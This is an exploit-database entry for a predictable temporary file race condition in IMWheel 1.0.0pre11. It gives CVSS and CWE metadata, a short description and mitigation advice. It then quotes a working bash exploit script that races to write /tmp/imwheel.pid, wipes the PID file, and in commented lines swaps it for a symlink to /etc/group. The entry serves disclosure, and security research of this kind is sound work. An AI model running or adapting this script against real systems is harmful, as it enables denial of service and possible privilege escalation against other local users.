Predictable Temporary File Creation Vulnerability in IMWheel

vendor:

IMWheel

by:

7.5

CVSS

HIGH

Predictable Temporary File Creation

377

CWE

Product Name: IMWheel

Affected Version From: 1.0.0pre11

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

Predictable Temporary File Creation Vulnerability in IMWheel

IMWheel is prone to a predictable temporary file creation vulnerability. This issue is a race condition error and may allow a local attacker to carry out denial of service attacks against other users and possibly gain elevated privileges. The vulnerability was identified in IMWheel 1.0.0pre11, however, other versions may be affected as well. The exploit script presented in the text demonstrates the vulnerability by creating a file with a predictable name and wiping its contents. It also provides an optional step to replace the file with a symbolic link to another file.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of IMWheel or apply any available security patches from the vendor. Additionally, ensure that the IMWheel process runs with minimal privileges and that proper file permissions are set for sensitive files and directories.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11008/info

IMWheel is reported prone to a predictable temporary file creation vulnerability. This issue is a race condition error and may allow a local attacker to carry out denial of service attacks against other users and possibly gain elevated privileges.

This vulnerability was identified in IMWheel 1.0.0pre11, however, other versions may be affected as well. 

#!/bin/bash

# you may have to adjust the number of characters in the print to
# get the timing correct for the injection. Fewer characters seems
# to prevent this from working. Optionally, replacing the echo
# with the symlink creation at the end of this script seems to work
# fairly regularly.
CHARCOUNT=4000

echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid
while [[ $? != 0 ]]; do
echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid
done

# Wait for imwheel to write it's pid to the new file
sleep 1
# Wipe the contents of the PID file.
echo > /tmp/imwheel.pid

# Optionally, replace the new file with a link
# rm /tmp/imwheel.pid
# ln -s /etc/group /tmp/imwheel.pid

echo "Exploit Successful!!!"